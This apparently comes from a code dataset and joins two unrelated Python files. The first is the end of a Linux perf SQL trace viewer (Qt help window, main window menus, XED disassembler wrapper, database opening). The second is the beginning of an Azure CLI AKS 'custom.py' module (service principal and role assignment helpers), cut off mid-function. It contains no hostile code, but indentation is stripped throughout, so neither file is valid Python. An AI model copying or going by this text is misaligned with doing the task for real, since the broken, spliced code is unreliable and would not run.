<h3>1.4.1 Time ranges</h3>
The time ranges hint text shows the total time range. Relative time ranges can also be entered in
ms, us or ns. Also, negative values are relative to the end of trace. Examples:
<pre>
81073085947329-81073085958238 From 81073085947329 to 81073085958238
100us-200us From 100us to 200us
10ms- From 10ms to the end
-100ns The first 100ns
-10ms- The last 10ms
</pre>
N.B. Due to the granularity of timestamps, there could be no branches in any given time range.
<h2 id=topcallsbyelapsedtime>1.5 Top calls by elapsed time</h2>
The Top calls by elapsed time report displays calls in descending order of time elapsed between when the function was called and when it returned.
The data is reduced by various selection criteria. A dialog box displays available criteria which are AND'ed together.
If not all data is fetched, a Fetch bar is provided. Ctrl-F displays a Find bar.
<h1 id=tables>2. Tables</h1>
The Tables menu shows all tables and views in the database. Most tables have an associated view
which displays the information in a more friendly way. Not all data for large tables is fetched
immediately. More records can be fetched using the Fetch bar provided. Columns can be sorted,
but that can be slow for large tables.
<p>There are also tables of database meta-information.
For SQLite3 databases, the sqlite_master table is included.
For PostgreSQL databases, information_schema.tables/views/columns are included.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<p>N.B. Results are found in id order, so if the table is re-ordered, find-next and find-previous
will go to the next/previous result in id order, instead of display order.
"""
# Help window
class HelpWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(HelpWindow, self).__init__(parent)
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setWidget(self.text)
AddSubWindow(glb.mainwindow.mdi_area, self, "Exported SQL Viewer Help")
# Main window that only displays the help text
class HelpOnlyWindow(QMainWindow):
def __init__(self, parent=None):
super(HelpOnlyWindow, self).__init__(parent)
self.setMinimumSize(200, 100)
self.resize(800, 600)
self.setWindowTitle("Exported SQL Viewer Help")
self.setWindowIcon(self.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.text = QTextBrowser()
self.text.setHtml(glb_help_text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.setCentralWidget(self.text)
# PostqreSQL server version
def PostqreSQLServerVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT VERSION()")
if query.next():
v_str = query.value(0)
v_list = v_str.strip().split(" ")
if v_list[0] == "PostgreSQL" and v_list[2] == "on":
return v_list[1]
return v_str
return "Unknown"
# SQLite version
def SQLiteVersion(db):
query = QSqlQuery(db)
QueryExec(query, "SELECT sqlite_version()")
if query.next():
return query.value(0)
return "Unknown"
# About dialog
class AboutDialog(QDialog):
def __init__(self, glb, parent=None):
super(AboutDialog, self).__init__(parent)
self.setWindowTitle("About Exported SQL Viewer")
self.setMinimumWidth(300)
pyside_version = "1" if pyside_version_1 else "2"
text = "<pre>"
text += "Python version: " + sys.version.split(" ")[0] + "\n"
text += "PySide version: " + pyside_version + "\n"
text += "Qt version: " + qVersion() + "\n"
if glb.dbref.is_sqlite3:
text += "SQLite version: " + SQLiteVersion(glb.db) + "\n"
else:
text += "PostqreSQL version: " + PostqreSQLServerVersion(glb.db) + "\n"
text += "</pre>"
self.text = QTextBrowser()
self.text.setHtml(text)
self.text.setReadOnly(True)
self.text.setOpenExternalLinks(True)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.text)
self.setLayout(self.vbox)
# Font resize
def ResizeFont(widget, diff):
font = widget.font()
sz = font.pointSize()
font.setPointSize(sz + diff)
widget.setFont(font)
def ShrinkFont(widget):
ResizeFont(widget, -1)
def EnlargeFont(widget):
ResizeFont(widget, 1)
# Unique name for sub-windows
def NumberedWindowName(name, nr):
if nr > 1:
name += " <" + str(nr) + ">"
return name
def UniqueSubWindowName(mdi_area, name):
nr = 1
while True:
unique_name = NumberedWindowName(name, nr)
ok = True
for sub_window in mdi_area.subWindowList():
if sub_window.name == unique_name:
ok = False
break
if ok:
return unique_name
nr += 1
# Add a sub-window
def AddSubWindow(mdi_area, sub_window, name):
unique_name = UniqueSubWindowName(mdi_area, name)
sub_window.setMinimumSize(200, 100)
sub_window.resize(800, 600)
sub_window.setWindowTitle(unique_name)
sub_window.setAttribute(Qt.WA_DeleteOnClose)
sub_window.setWindowIcon(sub_window.style().standardIcon(QStyle.SP_FileIcon))
sub_window.name = unique_name
mdi_area.addSubWindow(sub_window)
sub_window.show()
# Main window
class MainWindow(QMainWindow):
def __init__(self, glb, parent=None):
super(MainWindow, self).__init__(parent)
self.glb = glb
self.setWindowTitle("Exported SQL Viewer: " + glb.dbname)
self.setWindowIcon(self.style().standardIcon(QStyle.SP_ComputerIcon))
self.setMinimumSize(200, 100)
self.mdi_area = QMdiArea()
self.mdi_area.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.mdi_area.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.setCentralWidget(self.mdi_area)
menu = self.menuBar()
file_menu = menu.addMenu("&File")
file_menu.addAction(CreateExitAction(glb.app, self))
edit_menu = menu.addMenu("&Edit")
edit_menu.addAction(CreateAction("&Copy", "Copy to clipboard", self.CopyToClipboard, self, QKeySequence.Copy))
edit_menu.addAction(CreateAction("Copy as CS&V", "Copy to clipboard as CSV", self.CopyToClipboardCSV, self))
edit_menu.addAction(CreateAction("&Find...", "Find items", self.Find, self, QKeySequence.Find))
edit_menu.addAction(CreateAction("Fetch &more records...", "Fetch more records", self.FetchMoreRecords, self, [QKeySequence(Qt.Key_F8)]))
edit_menu.addAction(CreateAction("&Shrink Font", "Make text smaller", self.ShrinkFont, self, [QKeySequence("Ctrl+-")]))
edit_menu.addAction(CreateAction("&Enlarge Font", "Make text bigger", self.EnlargeFont, self, [QKeySequence("Ctrl++")]))
reports_menu = menu.addMenu("&Reports")
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("Context-Sensitive Call &Graph", "Create a new window containing a context-sensitive call graph", self.NewCallGraph, self))
if IsSelectable(glb.db, "calls", "WHERE parent_id >= 0"):
reports_menu.addAction(CreateAction("Call &Tree", "Create a new window containing a call tree", self.NewCallTree, self))
self.EventMenu(GetEventList(glb.db), reports_menu)
if IsSelectable(glb.db, "calls"):
reports_menu.addAction(CreateAction("&Top calls by elapsed time", "Create a new window displaying top calls by elapsed time", self.NewTopCalls, self))
self.TableMenu(GetTableList(glb), menu)
self.window_menu = WindowMenu(self.mdi_area, menu)
help_menu = menu.addMenu("&Help")
help_menu.addAction(CreateAction("&Exported SQL Viewer Help", "Helpful information", self.Help, self, QKeySequence.HelpContents))
help_menu.addAction(CreateAction("&About Exported SQL Viewer", "About this application", self.About, self))
def Try(self, fn):
win = self.mdi_area.activeSubWindow()
if win:
try:
fn(win.view)
except:
pass
def CopyToClipboard(self):
self.Try(CopyCellsToClipboardHdr)
def CopyToClipboardCSV(self):
self.Try(CopyCellsToClipboardCSV)
def Find(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.find_bar.Activate()
except:
pass
def FetchMoreRecords(self):
win = self.mdi_area.activeSubWindow()
if win:
try:
win.fetch_bar.Activate()
except:
pass
def ShrinkFont(self):
self.Try(ShrinkFont)
def EnlargeFont(self):
self.Try(EnlargeFont)
def EventMenu(self, events, reports_menu):
branches_events = 0
for event in events:
event = event.split(":")[0]
if event == "branches":
branches_events += 1
dbid = 0
for event in events:
dbid += 1
event = event.split(":")[0]
if event == "branches":
label = "All branches" if branches_events == 1 else "All branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewBranchView(x), self))
label = "Selected branches" if branches_events == 1 else "Selected branches " + "(id=" + dbid + ")"
reports_menu.addAction(CreateAction(label, "Create a new window displaying branch events", lambda a=None,x=dbid: self.NewSelectedBranchView(x), self))
def TableMenu(self, tables, menu):
table_menu = menu.addMenu("&Tables")
for table in tables:
table_menu.addAction(CreateAction(table, "Create a new window containing a table view", lambda a=None,t=table: self.NewTableView(t), self))
def NewCallGraph(self):
CallGraphWindow(self.glb, self)
def NewCallTree(self):
CallTreeWindow(self.glb, self)
def NewTopCalls(self):
dialog = TopCallsDialog(self.glb, self)
ret = dialog.exec_()
if ret:
TopCallsWindow(self.glb, dialog.report_vars, self)
def NewBranchView(self, event_id):
BranchWindow(self.glb, event_id, ReportVars(), self)
def NewSelectedBranchView(self, event_id):
dialog = SelectedBranchDialog(self.glb, self)
ret = dialog.exec_()
if ret:
BranchWindow(self.glb, event_id, dialog.report_vars, self)
def NewTableView(self, table_name):
TableWindow(self.glb, table_name, self)
def Help(self):
HelpWindow(self.glb, self)
def About(self):
dialog = AboutDialog(self.glb, self)
dialog.exec_()
# XED Disassembler
class xed_state_t(Structure):
_fields_ = [
("mode", c_int),
("width", c_int)
]
class XEDInstruction():
def __init__(self, libxed):
# Current xed_decoded_inst_t structure is 192 bytes. Use 512 to allow for future expansion
xedd_t = c_byte * 512
self.xedd = xedd_t()
self.xedp = addressof(self.xedd)
libxed.xed_decoded_inst_zero(self.xedp)
self.state = xed_state_t()
self.statep = addressof(self.state)
# Buffer for disassembled instruction text
self.buffer = create_string_buffer(256)
self.bufferp = addressof(self.buffer)
class LibXED():
def __init__(self):
try:
self.libxed = CDLL("libxed.so")
except:
self.libxed = None
if not self.libxed:
self.libxed = CDLL("/usr/local/lib/libxed.so")
self.xed_tables_init = self.libxed.xed_tables_init
self.xed_tables_init.restype = None
self.xed_tables_init.argtypes = []
self.xed_decoded_inst_zero = self.libxed.xed_decoded_inst_zero
self.xed_decoded_inst_zero.restype = None
self.xed_decoded_inst_zero.argtypes = [ c_void_p ]
self.xed_operand_values_set_mode = self.libxed.xed_operand_values_set_mode
self.xed_operand_values_set_mode.restype = None
self.xed_operand_values_set_mode.argtypes = [ c_void_p, c_void_p ]
self.xed_decoded_inst_zero_keep_mode = self.libxed.xed_decoded_inst_zero_keep_mode
self.xed_decoded_inst_zero_keep_mode.restype = None
self.xed_decoded_inst_zero_keep_mode.argtypes = [ c_void_p ]
self.xed_decode = self.libxed.xed_decode
self.xed_decode.restype = c_int
self.xed_decode.argtypes = [ c_void_p, c_void_p, c_uint ]
self.xed_format_context = self.libxed.xed_format_context
self.xed_format_context.restype = c_uint
self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
if magic == chr(127) + "ELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
def Main():
usage_str = "exported-sql-viewer.py [--pyside-version-1] <database name>\n" \
" or: exported-sql-viewer.py --help-only"
ap = argparse.ArgumentParser(usage = usage_str, add_help = False)
ap.add_argument("--pyside-version-1", action='store_true')
ap.add_argument("dbname", nargs="?")
ap.add_argument("--help-only", action='store_true')
args = ap.parse_args()
if args.help_only:
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
dbname = args.dbname
if dbname is None:
ap.print_usage()
print("Too few arguments")
sys.exit(1)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_12_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
